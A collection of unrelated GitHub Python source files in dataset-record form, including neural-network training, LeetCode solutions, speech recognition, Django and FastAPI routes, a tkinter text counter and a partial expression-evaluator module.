+{"seq_id":"70447131241","text":"import sys\nimport os\nsys.path.insert(1, os.path.join(sys.path[0], '..'))\n\nimport time\n\nimport data_loader\nfrom network import FullyConnectedFeedforwardNetwork\nfrom network import SimpleFeedforwardNetwork\nimport numpy as np\nimport pickle\n\n\ndef compare_result(predicted, expected):\n predicted_idx = np.argmax(predicted)\n expected_idx = np.argmax(expected)\n #print(\"validating testcase: expected %d, got %d\" % (expected_idx, predicted_idx))\n return predicted_idx == expected_idx\n\ndef validate_network(network, validation_data, max_data_count=None):\n \"\"\"\n max_data_count\n return the failure rate\n \"\"\"\n failure_count = 0\n total_count = 0\n for (vi, vo) in validation_data:\n total_count += 1\n predicted_output = network.GetOutput(vi)\n if (not compare_result(predicted_output, vo)):\n failure_count += 1\n if ((max_data_count is not None) and (total_count > max_data_count)):\n break\n\n result = failure_count / total_count\n return result\n\n\n\nif (__name__ == \"__main__\"):\n layer_sizes = [28*28, 30, 10]\n rho = 0.5 \n batch_size = 10\n max_epoch = 10\n\n use_simple_network = False\n if (len(sys.argv) > 2):\n raise RuntimeError(\"Do not know how to handle the command-line arguments:\\n{}\".format(sys.argv))\n elif (len(sys.argv) > 1):\n use_simple_network = (sys.argv[1] == \"simple\")\n\n if (use_simple_network):\n print(\"testing simple feedforward network\")\n n = SimpleFeedforwardNetwork(layer_sizes)\n else:\n print(\"testing fully connected feedforward network\")\n n = FullyConnectedFeedforwardNetwork(layer_sizes, \"sigmoid\")\n\n # load dataset\n training_data, validation_data, test_data = \\\n data_loader.load_mnist_dataset()\n\n # training\n for iter in range(max_epoch):\n start_time = time.time()\n actual_rho = rho / (iter + 1)\n np.random.shuffle(training_data)\n for k in range(batch_size, len(training_data), batch_size):\n #if (k > 10000):\n # break\n batch = training_data[k-batch_size:k]\n n.Train(batch, rho)\n # run validation data\n error_rate = validate_network(n, validation_data, 100)\n end_time = time.time()\n print(\"epoch %d: %.2fs, error rate %.2f%%\" % (iter, end_time - start_time, 100 * error_rate))\n pickle.dump(n, open(\"network.pkl\", \"wb\"))\n\n","repo_name":"lonelycorn/machine-learning","sub_path":"legacy/test/test_feedforward_network.py","file_name":"test_feedforward_network.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"9466685928","text":"\n\"\"\"\n1985. Find the Kth Largest Integer in the Array\n\nYou are given an array of strings nums and an integer k. Each string in nums represents \nan integer without leading zeros.\n\nReturn the string that represents the kth largest integer in nums.\n\nNote: Duplicate numbers should be counted distinctly. For example, if nums is [\"1\",\"2\",\"2\"], \n\"2\" is the first largest integer, \"2\" is the second-largest integer, and \"1\" is the third-largest integer.\nExample 1:\n\nInput: nums = [\"3\",\"6\",\"7\",\"10\"], k = 4\nOutput: \"3\"\nExplanation:\nThe numbers in nums sorted in non-decreasing order are [\"3\",\"6\",\"7\",\"10\"].\nThe 4th largest integer in nums is \"3\".\nExample 2:\n\nInput: nums = [\"2\",\"21\",\"12\",\"1\"], k = 3\nOutput: \"2\"\nExplanation:\nThe numbers in nums sorted in non-decreasing order are [\"1\",\"2\",\"12\",\"21\"].\nThe 3rd largest integer in nums is \"2\".\n\"\"\"\n\n# Approach 1: Sorting\n# Time complexity: O(nlogn)\n# Space complexity: O(1)\ndef kthLargestNumber(self, nums, k):\n for i, num in enumerate(nums):\n nums[i] = int(num)\n nums.sort(reverse = True)\n return str(nums[k-1])\n\n# Approach 2: Using a maxheap\n# Time complexity: O(klogn)\n# Space complexity: O(n)\nimport heapq\ndef findKthLargest(self, nums, k):\n heap = []\n\n for i in range(len(nums)):\n heap.append(-1*int(nums[i]))\n heapq.heapify(heap)\n while k > 0:\n K_largest = -1*(heapq.heappop(heap))\n k -= 1\n return str(K_largest)\n\n# Approach 3: Using Quick select\n# Time complexity: O(n) in the best case, worst case is O(n^2)\n# Space complexity: O(1)\nclass Solution(object):\n def findKthLargest(self, nums, k):\n return self.qs(nums, 0, len(nums)-1, k)\n \n def qs(self, arr, l, r, k):\n p = self.partition(arr, l, r)\n if (k-1) == p:\n return arr[p]\n elif (k-1) > p:\n return self.qs(arr, p + 1, r, k)\n else:\n return self.qs(arr, l, p - 1, k)\n\n def partition(self, arr, l, r):\n pivot = arr[r]\n i = l\n for j in range(l, r):\n if int(arr[j]) > int(pivot):\n arr[i], arr[j] = arr[j], arr[i]\n i += 1\n arr[i], arr[r] = arr[r], arr[i]\n return i\n\n","repo_name":"yonahgraphics/Grokking-Leetcode-Patterns","sub_path":"heaps/Find the Kth Largest Integer in the Array.py","file_name":"Find the Kth Largest Integer in the Array.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"}
+{"seq_id":"73569290599","text":"#from nltk import RegexpParser\r\n#from nltk import tokenize\r\n#from nltk.tree import *\r\n#from tempfile import TemporaryFile\r\nimport nltk\r\n#import os\r\nimport csv\r\nimport pandas as pd\r\n#import itertools\r\nfrom nltk.stem import WordNetLemmatizer\r\nfrom nltk.corpus import stopwords\r\n#from nltk.tokenize import word_tokenize\r\n#from nltk import word_tokenize, pos_tag, ne_chunk\r\n#import numpy as np\r\n#import math\r\n\r\n#Python 2.x program for Speech Recognition\r\n \r\nimport speech_recognition as sr\r\n \r\n#enter the name of usb microphone that you found\r\n#using lsusb\r\n#the following name is only used as an example\r\nmic_name = \"Microphone (High Definition Aud\"\r\n#Sample rate is how often values are recorded\r\nsample_rate = 48000\r\n#Chunk is like a buffer. It stores 2048 samples (bytes of data)\r\n#here. \r\n#it is advisable to use powers of 2 such as 1024 or 2048\r\nchunk_size = 2048\r\n#Initialize the recognizer\r\nr = sr.Recognizer()\r\n \r\n#generate a list of all audio cards/microphones\r\nmic_list = sr.Microphone.list_microphone_names()\r\n \r\n#the following loop aims to set the device ID of the mic that\r\n#we specifically want to use to avoid ambiguity.\r\nfor i, microphone_name in enumerate(mic_list):\r\n if microphone_name ==mic_list[2]:\r\n device_id = 2\r\n \r\n#use the microphone as source for input. Here, we also specify \r\n#which device ID to specifically look for incase the microphone \r\n#is not working, an error will pop up saying \"device_id undefined\"\r\nwith sr.Microphone(device_index = device_id, sample_rate = sample_rate,chunk_size = chunk_size) as source:\r\n #wait for a second to let the recognizer adjust the \r\n #energy threshold based on the surrounding noise level\r\n r.adjust_for_ambient_noise(source)\r\n print (\"Say Something\")\r\n #listens for the user's input\r\n audio = r.listen(source)\r\n \r\n try:\r\n text = r.recognize_google(audio)\r\n print (\"you said:\" + text)\r\n \r\n #error occurs when google could not understand what was said\r\n \r\n except sr.UnknownValueError:\r\n print(\"Google Speech Recognition could not understand audio\")\r\n \r\n except sr.RequestError as e:\r\n print(\"Could not request results from Google Speech Recognition service; {0}\".format(e))\r\n\r\n\r\n\r\n\r\ndef one():\r\n \r\n stop_words = set(stopwords.words('english'))\r\n sent_text = nltk.sent_tokenize(text)\r\n file = open('Text_Without_Stopwords.txt','w') \r\n for sentence in sent_text:\r\n tokenized_text = nltk.word_tokenize(sentence)\r\n filtered_sentence = [w for w in tokenized_text if not w in stop_words]\r\n filtered_sentence = []\r\n temp=\"\"\r\n \r\n for w in tokenized_text:\r\n if w not in stop_words:\r\n filtered_sentence.append(w)\r\n temp = temp + w +\" \"\r\n\r\n #print(temp)\r\n file.write(temp)\r\n file.close()\r\n \r\n \r\n \r\ndef two():\r\n file = open('Text_Without_Stopwords.txt','r') \r\n text = file.read()\r\n file.close()\r\n lemmatizer = WordNetLemmatizer()\r\n\r\n stop_words = set(stopwords.words('english'))\r\n sent_text = nltk.sent_tokenize(text)\r\n file = open('Text_Lemmatized.txt','w') \r\n for sentence in sent_text:\r\n tokenized_text = nltk.word_tokenize(sentence)\r\n filtered_sentence = [w for w in tokenized_text if not w in stop_words]\r\n #filtered_sentence = []\r\n temp=\"\"\r\n tokenized_text = nltk.word_tokenize(sentence)\r\n for w in tokenized_text:\r\n #filtered_sentence.append(w)\r\n temp = temp + lemmatizer.lemmatize(w) +\" \"\r\n file.write(temp)\r\n 
file.close()\r\n \r\n\r\ndef three():\r\n file = open('Text_Lemmatized.txt','r') \r\n text = file.read()\r\n file.close()\r\n word_list = text.split()\r\n word_list = [word.replace(\".\", \"\") for word in word_list]\r\n word_list = [word.replace(\",\", \"\") for word in word_list]\r\n file = open ('Text_Unique_Words.txt', 'w')\r\n #print(word_list)\r\n unique_words = set(word_list)\r\n #print(unique_words)\r\n for word in unique_words:\r\n file.write(str(word)+\" \")\r\n file.close()\r\n \r\n \r\ndef four():\r\n file = open('Text_Unique_Words.txt','r') \r\n text = file.read()\r\n file.close()\r\n wordlist = text.split()\r\n file = open('Text_to_Vector.txt','w') \r\n \r\n file1 = open('Text_Lemmatized.txt','r') \r\n text = file1.read()\r\n file1.close()\r\n sent_text = nltk.sent_tokenize(text)\r\n file.write(str(wordlist) + '\\n')\r\n for sentence in sent_text:\r\n tokenized_text = nltk.word_tokenize(sentence)\r\n wordfreq = []\r\n for w in wordlist:\r\n wordfreq.append(sentence.count(w))\r\n\r\n file.write(str(wordfreq) + '\\n')\r\n file.close()\r\n\r\n # Read in the file\r\n with open('Text_to_Vector.txt', 'r') as file :\r\n filedata = file.read()\r\n file.close()\r\n \r\n # Replace the target string\r\n filedata = filedata.replace('[', '')\r\n filedata = filedata.replace(']', '')\r\n \r\n # Write the file out again\r\n with open('Text_to_Vector.txt', 'w') as file:\r\n file.write(filedata)\r\n file.close()\r\n\r\n\r\ndef five():\r\n with open('Text_to_Vector.txt', 'r') as in_file:\r\n stripped = (line.strip() for line in in_file)\r\n\r\n lines = (line.split(\",\") for line in stripped if line)\r\n with open('WordVectortest.csv', 'w') as out_file:\r\n writer = csv.writer(out_file)\r\n #writer.writerow(('title', 'intro'))\r\n writer.writerows(lines)\r\n \r\none()\r\ntwo()\r\nthree()\r\nfour()\r\nfive()\r\n \r\n\r\ntestset = pd.read_csv('WordVectortest.csv')\r\ntestsetval = list(testset)\r\n#print(testsetval)\r\n\r\nfor i in range(len(testsetval)):\r\n testsetval[i] = testsetval[i].lower()\r\n if ' ' in testsetval[i]:\r\n testsetval[i] = testsetval[i].replace(' ','')\r\n \r\n\r\n\r\ndataset = pd.read_csv('WordVector.csv')\r\ndatasetval = list(dataset)\r\n#print(datasetval)\r\n\r\n\r\nfor i in range(len(datasetval)):\r\n datasetval[i] = datasetval[i].lower()\r\n if ' ' in datasetval[i]:\r\n datasetval[i] = datasetval[i].replace(' ','')\r\n \r\n \r\n \r\n \r\n\r\ncount = []\r\nfor k in range(len(dataset)):\r\n myset = dataset.iloc[k]\r\n c = 0\r\n for i in range(len(testsetval)):\r\n if myset[datasetval.index(testsetval[i])]==1:\r\n c = c + 1\r\n count.append(c)\r\n \r\n\r\n#print(count.index(max(count)))\r\n\r\n\r\nmyfile = open('passage.txt','r')\r\n\r\ndata = myfile.read()\r\n\r\nmydata = data.split('.')\r\nans=mydata[count.index(max(count))]\r\n\r\nmyfile.close()\r\nprint(ans)\r\nfrom gtts import gTTS\r\ntts = gTTS(text=ans, lang='en')\r\ntts.save('ans2.mp3')\r\nimport pygame\r\npygame.init()\r\npygame.mixer.music.load(\"ans2.mp3\")\r\npygame.mixer.music.play()\r\n'''from playsound import playsound\r\nplaysound('ans2.mp3')'''","repo_name":"bhanu-prakash3/Question-Answering-System","sub_path":"new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":6696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
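Stripped of the file I/O and CSV round-trips, the retrieval step in the record above is a bag-of-words overlap between the question and each passage sentence. A compact restatement of that idea with illustrative data, not the repository's passage.txt:

def best_sentence(question, passage):
    # Score each sentence by how many question words it shares; return the best match.
    q_words = set(question.lower().split())
    sentences = [s.strip() for s in passage.split(".") if s.strip()]
    return max(sentences, key=lambda s: len(q_words & set(s.lower().split())))

passage = "The sky is blue. Grass is green. Snow is white."
print(best_sentence("what color is grass", passage))  # -> Grass is green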
+{"seq_id":"828436883","text":"#descripcion: programa donde se le pregunte al usuario por un numero e imprima los divisores de ese numero\n#entrada: preguntar al usuario por un numero \n#salida: numero divisores de el numero dado por el usuario\n#autor: mvillalobos\n#fecha :12/07/2017\n#version:2.0\n#plataforma: python v2.7\n\nx = int(input(\"ingrese numero:\"))\nfor i in range(1,x + 1):\n if x%i==0:\n print(i)\n","repo_name":"mvillalobos712/ejercicios_python","sub_path":"ejercicios_python5.1.py","file_name":"ejercicios_python5.1.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"19702006885","text":"from matplotlib import *\nfrom numpy import *\nfrom scipy import *\nfrom pandas import *\n\nmainMenuPrint: str = \"Main Menu: \\n[1] New Data \\n[2] Open Data \\n[3] Save Data \\n[4] View Data \\n[5] Edit Data \\n[6]\" \\\n \" Show Save File Path \\n[7] Check Concordant Results \\n[8] Average Data\\n[9] Plot Graph\"\nfirstStart: bool = True\nanyData: bool = False\ndataSaved: bool = False\nyesNo = ''\nseeData = ''\nDataFile: str = ''\n\ndef firstTime():\n global firstStart\n while firstStart == True:\n print('Welcome to SciLabs, this is an interface to help with data analysis for sciences \\nPlease remmeber to enter the value shown in the [], but without the surrounding []')\n firstStart = False\n\ndef saveYesNo():\n global yesNo\n while yesNo not in ('Y', 'N'):\n yesNo = input('Do you want to save: \\n[Y]es \\n[N]o:\\n')\n if yesNo == 'Y':\n saveData()\n break\n elif yesNo == 'N':\n pass\n break\n else:\n errorOut(1)\n\ndef openData():\n global seeData\n global dataSaved\n global path\n global DataFile\n if dataSaved == False:\n print('Current Data is not saved')\n saveYesNo()\n else:\n pass\n path = str(input('Enter file path \\nShould be a .txt file in current directory where this program is running from:\\n'))\n DataFile = open(path, 'r+')\n\n while seeData not in ('Y', 'N'):\n seeData = str(input('Do you want to see your data: \\n[Y]es \\n[N]o: \\n'))\n if seeData == 'Y':\n viewData()\n elif seeData == 'N':\n pass\n else:\n errorOut(1)\n\n\ndef errorOut(state):\n print('There has been an error:')\n if state == 1:\n print('Input not recognised, please try again\\n')\n elif state == 2:\n print('No data present, please create data\\n')\n else:\n print('Big problem: Error not known!\\n')\n\n\ndef mainMenu():\n firstTime()\n\n print(mainMenuPrint)\n menuInput: int = int(input('Enter option:'))\n\n if menuInput == 2:\n openData()\n elif menuInput == 3:\n saveData()\n elif menuInput == 4:\n viewData()\n elif menuInput == 5:\n editData()\n elif menuInput == 6:\n fileLoc()\n elif menuInput == 7:\n checkConcord()\n elif menuInput == 8:\n averageData()\n elif menuInput == 9:\n plotGraph()\n elif menuInput == 1:\n newData()\n else:\n errorOut(1)\n\n\nwhile True:\n mainMenu()\n","repo_name":"thomasholland123/SDAK","sub_path":"sdak.py","file_name":"sdak.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"74893744998","text":"from django.conf.urls import url\nfrom kompany import views\n\nurlpatterns = [\n url(r'^$', views.home_page, name='home'),\n url(r'^search/$', views.search, name='search'),\n url(r'^product/(?P[-\\w]+)/$', views.product_page, name='product_page'),\n url(r'^(?P[a-z]+)/(?P[-\\w]+)/$', views.category_view, name='product_list'),\n url(r'^(?P[-\\w]+)/$', views.category_view, name='product_list'),\n]\n","repo_name":"iamvinitk/Online-Retail","sub_path":"kompany/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"18"}
+{"seq_id":"5554043440","text":"import os\nimport random\nimport string\nfrom enum import Enum\n\nfrom fastapi import APIRouter, UploadFile, File, Depends\nfrom pdfminer.pdfparser import PDFSyntaxError\nfrom starlette.responses import JSONResponse\n\nfrom app.db.crud import CrudDatabase\nfrom app.utils.pdfparser import shop_parse_pdf, user_parse_pdf\nfrom app.utils.pdfsaver import chunked_copy, generate_path_file\n\nfile_router = APIRouter()\n\n\nclass ParseEnum(str, Enum):\n SHOP = \"shop\"\n USER = \"user\"\n\n\n@file_router.post(\"/upload/document\")\nasync def parse_pdf(document_type: ParseEnum, file: UploadFile = File(...)):\n exception = JSONResponse(\n status_code=400,\n content={\n \"content\": \"An error occurred while trying to disband the document,\"\n \" please try again later.\"\n }\n )\n\n if document_type == ParseEnum.SHOP:\n try:\n result = shop_parse_pdf(path=file.file)\n return result\n except ValueError:\n return exception\n\n if document_type == ParseEnum.USER:\n try:\n result = user_parse_pdf(path=file.file)\n return result\n except ValueError:\n return exception\n\n\n","repo_name":"SilentSt/AnoFoodsharingREST","sub_path":"app/routes/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"4788275670","text":"\nimport tkinter as tk\n\nframe = tk.Tk()\nframe.title(\"Text counter\")\nframe.geometry('400x200')\n\n \ndef printInput():\n inp = inputtxt.get(1.0, \"end-1c\")\n lbl.config(text = \"Words \"+str(len(inp.split())))\n\ndef letterInput():\n inp = inputtxt.get(1.0, \"end-1c\")\n lbl.config(text = \"Characters \"+str(len(inp)))\n \n\ninputtxt = tk.Text(frame, height = 5, width = 20)\n \ninputtxt.pack()\n \n\nprintButton = tk.Button(frame,text = \"Check how many words are there:\", command = printInput)\nprintButton.pack()\nletterButton = tk.Button(frame,text =\"check how many letters are there:\",command = letterInput)\nletterButton.pack()\n\nlbl = tk.Label(frame, text = \"\")\nlbl.pack()\nframe.mainloop()\n","repo_name":"DhruvaNaik/words-and-letter-counter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"15528695253","text":"from subprocess import Popen, PIPE\nimport torch\n\ndef get_first_free_gpu():\n if torch.cuda.is_available():\n gpu_output = Popen([\"nvidia-smi\", \"-q\", \"-d\", \"PIDS\"], stdout=PIPE, encoding=\"utf-8\")\n gpu_processes = Popen([\"grep\", \"Processes\"], stdin=gpu_output.stdout, stdout=PIPE, encoding=\"utf-8\")\n gpu_output.stdout.close()\n processes_output = gpu_processes.communicate()[0]\n for i, line in enumerate(processes_output.strip().split(\"\\n\")):\n if line.endswith(\"None\"):\n print(f\"Found Free GPU ID: {i}\")\n cuda_device = f\"cuda:{i}\"\n torch.cuda.set_device(cuda_device)\n return torch.device(cuda_device)\n print(\"WARN - No Free GPU found! Running on CPU instead...\")\n return torch.device(\"cpu\")\n","repo_name":"technion-nlp-lab/utils","sub_path":"get_first_free_gpu.py","file_name":"get_first_free_gpu.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"75087281641","text":"from tornado import web, ioloop, httpserver\nfrom handlers import BaseHandler\nfrom models import user_mod, log_mod\nfrom lib import alg_list\nimport tornado\n\n\nclass AlgShowHandler(BaseHandler.BaseHandler):\n @tornado.web.authenticated\n def get(self):\n username = tornado.escape.json_decode(self.current_user)\n usermod = user_mod.UserModel()\n userinfo = usermod.find_user(username)\n curid = self.get_argument('algid')\n\n strh = str(userinfo['haveseen'])\n print(strh)\n if strh == 'None':\n strh = curid\n else:\n haveseen = userinfo['haveseen'].split(' ')\n if curid not in haveseen:\n strh += ' ' + curid\n\n usermod.update_user_haveseen(userinfo['id'], strh)\n usermod.update_user_lastseen(userinfo['id'], curid)\n self.render(\n 'algorithm.html',\n alg_list=alg_list.alg,\n username=username,\n curid=curid,\n )\n","repo_name":"acptek/VisualPanel","sub_path":"handlers/AlgorithmShow.py","file_name":"AlgorithmShow.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"33578535977","text":"from __future__ import print_function\nimport sys\nimport os\nimport re\nimport inspect\nimport six\nfrom AssimCtypes import ADDR_FAMILY_IPV4, ADDR_FAMILY_IPV6\nfrom AssimCclasses import pyNetAddr, pyConfigContext\n\n#\n#\nclass GraphNodeExpression(object):\n \"\"\"We implement Graph node expressions - we are't a real class\"\"\"\n\n functions = {}\n\n def __init__(self):\n raise NotImplementedError(\"This is not a real class\")\n\n @staticmethod\n def evaluate(expression, context):\n \"\"\"\n Evaluate an expression.\n It can be:\n None - return None\n 'some-value -- return some-value (it's a constant)\n or an expression to find in values or graphnodes\n or @functionname(args) - for defined functions...\n\n We may add other kinds of expressions in the future...\n \"\"\"\n if not isinstance(expression, six.string_types):\n # print('RETURNING NONSTRING:', expression, file=sys.stderr)\n return expression\n expression = str(expression.strip())\n if not hasattr(context, \"get\") or not hasattr(context, \"__setitem__\"):\n context = ExpressionContext(context)\n # print('''EVALUATE('%s') (%s):''' % (expression, type(expression))\n # The value of this parameter is a constant...\n if expression.startswith('\"'):\n if expression[-1] != '\"':\n print(\"unquoted constant string '%s'\" % expression, file=sys.stderr)\n # print('''Constant string: \"%s\"''' % (expression[1:-1]), file=sys.stderr)\n return expression[1:-1] if expression[-1] == '\"' else None\n if (expression.startswith(\"0x\") or expression.startswith(\"0X\")) and len(expression) > 3:\n return int(expression[2:], 16)\n if expression.isdigit():\n return int(expression, 8) if expression.startswith(\"0\") else int(expression)\n if expression.find(\"(\") >= 0:\n value = GraphNodeExpression.functioncall(expression, context)\n context[expression] = value\n return value\n # if expression.startswith('$'):\n # print('RETURNING VALUE OF %s' % expression[1:], file=sys.stderr)\n # print('Context is %s' % str(context), file=sys.stderr)\n # print('RETURNING VALUE OF %s = %s'\\, file=sys.stderr)\n # % (expression, context.get(expression[1:], None))\n value = context.get(expression[1:], None) if expression.startswith(\"$\") else expression\n return value\n\n # pylint R0912: too many branches - really ought to write a lexical analyzer and parser\n # On the whole it would be simpler and easier to understand...\n # pylint: disable=R0912\n @staticmethod\n def _compute_function_args(arglist, context):\n \"\"\"Compute the arguments to a function call. 
May contain function calls\n and other GraphNodeExpression, or quoted strings...\n Ugly lexical analysis.\n Really ought to write a real recursive descent parser...\n \"\"\"\n # print('_compute_function_args(%s)' % str(arglist), file=sys.stderr)\n args = []\n argstrings = []\n nestcount = 0\n arg = \"\"\n instring = False\n prevwasquoted = False\n for char in arglist:\n if instring:\n if char == '\"':\n instring = False\n prevwasquoted = True\n else:\n arg += char\n elif nestcount == 0 and char == '\"':\n instring = True\n elif nestcount == 0 and char == \",\":\n if prevwasquoted:\n prevwasquoted = False\n args.append(arg)\n argstrings.append(arg)\n else:\n arg = arg.strip()\n if arg == \"\":\n continue\n # print(\"EVALUATING [%s]\" % arg, file=sys.stderr)\n args.append(GraphNodeExpression.evaluate(arg, context))\n argstrings.append(arg)\n arg = \"\"\n elif char == \"(\":\n nestcount += 1\n # print(\"++nesting: %d\" % (nestcount), file=sys.stderr)\n arg += char\n elif char == \")\":\n arg += char\n nestcount -= 1\n # print(\"--nesting: %d\" % (nestcount), file=sys.stderr)\n if nestcount < 0:\n return (None, None)\n if nestcount == 0:\n if prevwasquoted:\n # print('_compute_function_args: QUOTED argument: \"%s\"' % arg, file=sys.stderr)\n args.append(arg)\n else:\n arg = arg.strip()\n # print(\"GnE.functioncall [%s]\" % arg, file=sys.stderr)\n args.append(GraphNodeExpression.functioncall(arg, context))\n argstrings.append(arg)\n arg = \"\"\n else:\n arg += char\n if nestcount > 0 or instring:\n # print(\"Nestcount: %d, instring: %s\" % (nestcount, instring), file=sys.stderr)\n return (None, None)\n if arg != \"\":\n if prevwasquoted:\n # print('_compute_function_args: quoted argument: \"%s\"' % arg, file=sys.stderr)\n args.append(arg)\n else:\n # print(\"GnE.evaluate [%s]\" % arg, file=sys.stderr)\n args.append(GraphNodeExpression.evaluate(arg, context))\n argstrings.append(arg)\n # print('RETURNING [%s] [%s]' % (args, argstrings), file=sys.stderr)\n return (args, argstrings)\n\n @staticmethod\n def functioncall(expression, context):\n \"\"\"Performs a function call for our expression language\n\n Figures out the function name, and the arguments and then\n calls that function with those arguments.\n\n All our defined functions take an argv argument string first, then an\n ExpressionContext argument.\n\n This parsing is incredibly primitive. 
Feel free to improve it ;-)\n\n \"\"\"\n expression = expression.strip()\n if expression[-1] != \")\":\n print(\"%s does not end in )\" % expression, file=sys.stderr)\n return None\n expression = expression[: len(expression) - 1]\n (funname, arglist) = expression.split(\"(\", 1)\n # print('FUNCTIONCALL: %s(%s)' % (funname, arglist), file=sys.stderr)\n funname = funname.strip()\n arglist = arglist.strip()\n #\n # At this point we have all our arguments as a string , but it might contain\n # other (nested) calls for us to evaluate\n #\n # print('FunctionCall: arglist: [%s]' % (arglist), file=sys.stderr)\n args, _argstrings = GraphNodeExpression._compute_function_args(arglist, context)\n # print('args: %s' % (args), file=sys.stderr)\n # print('_argstrings: %s' % (_argstrings), file=sys.stderr)\n if args is None:\n return None\n\n if funname.startswith(\"@\"):\n funname = funname[1:]\n if funname not in GraphNodeExpression.functions:\n print(\"BAD FUNCTION NAME: %s\" % funname, file=sys.stderr)\n return None\n # print('ARGSTRINGS %s(%s)' % (funname, str(_argstrings)), file=sys.stderr)\n # print('ARGS: %s' % (str(args)), file=sys.stderr)\n ret = GraphNodeExpression.functions[funname](args, context)\n # print('%s(%s) => %s' % (funname, args, ret), file=sys.stderr)\n return ret\n\n @staticmethod\n def FunctionDescriptions():\n \"\"\"Return a list of tuples of (funcname, docstring) for all our GraphNodeExpression\n defined functions. The list is sorted by function name.\n \"\"\"\n names = sorted(GraphNodeExpression.functions.keys())\n ret = []\n for name in names:\n ret.append((name, inspect.getdoc(GraphNodeExpression.functions[name])))\n return ret\n\n @staticmethod\n def RegisterFun(function):\n \"Function to register other functions as built-in GraphNodeExpression functions\"\n GraphNodeExpression.functions[function.__name__] = function\n return function\n\n\nclass ExpressionContext(object):\n \"\"\"This class defines a context for an expression evaluation.\n There are three parts to it:\n 1) A cache of values which have already been computed\n 2) A scope/context for expression evaluation - a default name prefix\n 3) A set of objects which implement the 'get' operation to be used in\n evaluating values of names\n\n We act like a dict, implementing these member functions:\n __iter__, __contains__, __len__, __getitem__ __setitem__, __delitem__,\n get, keys, has_key, clear, items\n \"\"\"\n\n def __init__(self, objects, prefix=None):\n \"Initialize our ExpressionContext\"\n self.objects = objects if isinstance(objects, (list, tuple)) else (objects,)\n self.prefix = prefix\n self.values = {}\n\n def __str__(self):\n ret = \"ExpressionContext(\"\n delim = \"[\"\n for obj in self.objects:\n ret += \"%s%s\" % (delim, str(obj))\n delim = \", \"\n ret += \"])\"\n return ret\n\n def keys(self):\n \"\"\"Return the complete set of keys in all our constituent objects\"\"\"\n retkeys = set()\n for obj in self.objects:\n for key in obj:\n retkeys.add(key)\n return retkeys\n\n @staticmethod\n def _fixvalue(v):\n \"Fix up a return value to avoid unicode values...\"\n return v\n if not isinstance(v, str) and hasattr(v, \"__iter__\") and not hasattr(v, \"__getitem__\"):\n ret = []\n for item in v:\n ret.append(ExpressionContext._fixvalue(item))\n return ret\n return v\n\n def get(self, key, alternative=None):\n \"\"\"Return the value associated with a key - cached or otherwise\n and cache it.\"\"\"\n if key in self.values:\n return self.values[key]\n for obj in self.objects:\n ret = None\n try:\n # print('GETTING 
%s in %s: %s' % (key, type(obj), obj), file=sys.stderr)\n ret = obj.get(key, None)\n if ret is None and hasattr(obj, \"deepget\"):\n ret = obj.deepget(key, None)\n # print('RETURNED %s' % ret, file=sys.stderr)\n # Too general exception catching...\n # pylint: disable=W0703\n except Exception as e:\n ret = None\n print(\"OOPS: self.objects = %s / exception %s\" % (str(self.objects), e), sys.stderr)\n print(\"OOPS: OUR object = %s (%s)\" % (str(obj), type(obj)), file=sys.stderr)\n ret = ExpressionContext._fixvalue(ret)\n if ret is not None:\n self.values[key] = ret\n return ret\n if self.prefix is not None:\n ret = ExpressionContext._fixvalue(obj.get(\"%s.%s\" % (self.prefix, key), None))\n if ret is not None:\n self.values[key] = ret\n return ret\n return alternative\n\n def clear(self):\n \"Clear our cached values\"\n self.values = {}\n\n def items(self):\n \"Return all items from our cache\"\n return self.values.items()\n\n def __iter__(self):\n \"Yield each key from self.keys() in turn\"\n for key in self.keys():\n yield key\n\n def __contains__(self, key):\n \"Return True if we can get() this key\"\n return self.get(key, None) is not None\n\n def has_key(self, key):\n \"Return True if we can get() this key\"\n return self.get(key, None) is not None\n\n def __len__(self):\n \"Return the number of keys in our objects\"\n return len(self.keys())\n\n def __getitem__(self, key):\n \"Return the given item, or raise KeyError if not found\"\n ret = self.get(key, None)\n if ret is None:\n raise KeyError(key)\n return ret\n\n def __setitem__(self, key, value):\n \"Cache the value associated with this key\"\n self.values[key] = value\n\n def __delitem__(self, key):\n \"Remove the cache value associated with this key\"\n del self.values[key]\n\n\n@GraphNodeExpression.RegisterFun\ndef IGNORE(_ignoreargs, _ignorecontext):\n \"\"\"Function to ignore its argument(s) and return True all the time.\n This is a special kind of no-op in that it is used to override\n and ignore an underlying rule. It is expected that its arguments\n will explain why it is being ignored in this rule set.\n \"\"\"\n return True\n\n\n@GraphNodeExpression.RegisterFun\ndef EQ(args, _context):\n \"\"\"Function to return True if each non-None argument in the list matches\n every non-None argument and at least one of its subsequent arguments are not None.\n \"\"\"\n # print('EQ(%s) =>?' 
